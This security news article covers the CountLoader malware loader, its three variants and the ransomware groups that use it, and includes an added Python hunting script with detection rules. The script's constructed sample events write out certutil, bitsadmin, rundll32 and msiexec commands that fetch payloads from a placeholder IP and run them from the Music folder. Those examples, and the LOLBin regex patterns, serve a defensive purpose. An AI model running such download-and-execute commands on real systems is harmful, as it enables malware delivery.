Cybersecurity researchers have identified a new malware loader, CountLoader, that has been adopted by Russian ransomware operations to carry post-exploitation tools such as Cobalt Strike and AdaptixC2, along with the PureHVNC RAT, according to analysis conducted by Silent Push. The firm described CountLoader as a modular loader used either by Initial Access Brokers or by ransomware affiliates tied to groups including LockBit, Black Basta, and Qilin. Silent Push said the loader has been observed in at least three flavors and is actively deployed in campaigns abroad, including those aimed at Ukraine.
The loader appears in three variants – .NET, PowerShell and JavaScript – with campaigns that targeted individuals in Ukraine using PDF-based phishing lures impersonating the National Police of Ukraine. The PowerShell variant had previously been reported by researchers as being distributed through DeepSeek-themed decoys.
In addition to its loader capabilities, Silent Push reported the implant BrowserVenom, deployed through CountLoader, which can reconfigure all browsing traffic to route through a proxy controlled by the attackers. The aim is to manipulate network traffic and harvest data for use in subsequent stages of an intrusion.
Among the JavaScript version’s features, CountLoader offers six distinct methods for downloading files, three methods for executing various malware binaries, and a predefined function that can identify a victim’s device based on Windows domain information. The malware also exhibits system information gathering, persistence via a scheduled task that impersonates a Google Update task for the Chrome browser, and the ability to connect to a remote server for further instructions.
Experts note that CountLoader can download and run DLL and MSI payloads using Windows utilities such as rundll32.exe and msiexec.exe, transmit system metadata, and delete the scheduled tasks it created. The six file-download methods are curl, PowerShell, MSXML2.XMLHTTP, WinHTTP.WinHttpRequest.5.1, bitsadmin and certutil.exe, giving the loader several fallback routes for retrieving payloads. Silent Push singled out the use of LOLBins such as certutil and bitsadmin and a command-encryption scheme embedded in the PowerShell generator for on-demand execution, describing these traits as indicative of advanced Windows malware development.
A notable aspect of CountLoader is its use of the victim’s Music folder as a staging ground for malware. The .NET variant appears somewhat streamlined, offering only two command types (UpdateType.Zip and UpdateType.Exe) compared with the JavaScript version’s broader capabilities.
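The behaviours described above (LOLBin downloads via certutil and bitsadmin, payload staging in the user's Music folder, rundll32/msiexec execution from that folder, and a scheduled task posing as a Google Update task) translate directly into endpoint hunting rules. The following script is an added example written for this page, not code from Silent Push or from the malware; it runs a few such rules over constructed Sysmon-style process and scheduled-task records. The sample events, paths, IP addresses and task names are all made up for illustration.

```python
import re
from pathlib import PureWindowsPath

# --- Constructed sample telemetry (not real captures) -----------------------
# Process events use the Sysmon Event ID 1 field names "Image" and "CommandLine".
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/u.dll C:\Users\bob\Music\u.dll"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 http://203.0.113.10/p.msi C:\Users\bob\Music\p.msi"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\bob\Music\u.dll,Start"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\bob\Music\p.msi /qn"},
    # Benign activity that must not fire: hashing a file, installing from Downloads.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\bob\Downloads\7zip.msi"},
]

# Scheduled tasks as (name, action) pairs, e.g. exported from schtasks /query.
SAMPLE_TASKS = [
    # A task whose action lives in the real Google Update directory (legitimate shape).
    {"TaskName": r"\GoogleUpdateTaskMachineUA",
     "Action": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler"},
    # A look-alike name whose action runs a script from the Music folder (constructed).
    {"TaskName": r"\GoogleUpdateTaskMachineCore1",
     "Action": r"wscript.exe C:\Users\bob\Music\update.js"},
]

# --- Detection rules ---------------------------------------------------------
# Download-capable LOLBins and the command-line fragments that indicate a fetch.
DOWNLOAD_PATTERNS = {
    "certutil.exe":   re.compile(r"-urlcache", re.I),
    "bitsadmin.exe":  re.compile(r"/transfer", re.I),
    "curl.exe":       re.compile(r"https?://", re.I),
    "powershell.exe": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
}
# Binaries the article names as used to run DLL/MSI payloads (plus script hosts).
EXEC_LOLBINS = {"rundll32.exe", "msiexec.exe", "wscript.exe", "cscript.exe", "regsvr32.exe"}
MUSIC_PATH = re.compile(r"\\Users\\[^\\]+\\Music\\", re.I)
GOOGLE_UPDATE_DIR = re.compile(r'^"?C:\\Program Files( \(x86\))?\\Google\\Update\\', re.I)


def image_name(image: str) -> str:
    """Basename of an image path, lower-cased for comparison."""
    return PureWindowsPath(image).name.lower()


def flag_process(event: dict) -> list:
    """Return the names of every rule a process-creation event matches."""
    hits = []
    name = image_name(event["Image"])
    cmd = event["CommandLine"]
    pattern = DOWNLOAD_PATTERNS.get(name)
    if pattern and pattern.search(cmd):
        hits.append("lolbin_download")
    if MUSIC_PATH.search(cmd):
        hits.append("music_folder_staging")
        if name in EXEC_LOLBINS:
            hits.append("lolbin_exec_from_music")
    return hits


def flag_task(task: dict) -> list:
    """Flag a task that borrows the Google Update name but runs from elsewhere."""
    if "googleupdate" in task["TaskName"].lower() and not GOOGLE_UPDATE_DIR.match(task["Action"]):
        return ["google_update_impersonation"]
    return []


def scan(process_events: list, tasks: list) -> list:
    """One finding per flagged event or task, with the matched rules and evidence."""
    findings = []
    for ev in process_events:
        rules = flag_process(ev)
        if rules:
            findings.append({"rules": rules, "evidence": ev["CommandLine"]})
    for task in tasks:
        rules = flag_task(task)
        if rules:
            findings.append({"rules": rules, "evidence": f'{task["TaskName"]} -> {task["Action"]}'})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_PROCESS_EVENTS, SAMPLE_TASKS):
        print(", ".join(finding["rules"]), "|", finding["evidence"])
```

On the constructed sample the four staging and execution events fire, the two benign certutil/msiexec commands stay silent, and only the look-alike scheduled task is reported; the real Google Update task path is the whitelist. The Music-folder and task-name checks are deliberately narrow to the behaviour Silent Push described, so in production they belong alongside broader rules (for example, any script host launched by a scheduled task from a user-writable directory).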
The actors behind CountLoader have built an infrastructure of more than 20 unique domains, with the loader serving as a pipeline for Cobalt Strike, AdaptixC2 and PureHVNC RAT. The PureHVNC RAT is a commercial offering associated with an actor known as PureCoder, a link illustrated in broader industry analyses. Context on these relationships is provided in independent research and is complemented by related coverage from Netresec.
DomainTools researchers have mapped the interconnected nature of the Russian ransomware ecosystem, noting movement of operators across groups and the use of tools such as AnyDesk and Quick Assist. They describe brand allegiance among operators as weak and emphasize that human networks drive collaboration more than any single malware family. DomainTools Investigations argues that operators adapt quickly to takedowns and rely on trusted relationships when choosing collaborators.
Analysts have also highlighted campaigns tied to the broader Russian-affiliated ransomware landscape, with Check Point describing those behind PureRAT as using a revolving set of GitHub accounts to host files that support PureRAT’s functionality, and employing the ClickFix social engineering tactic to lure victims.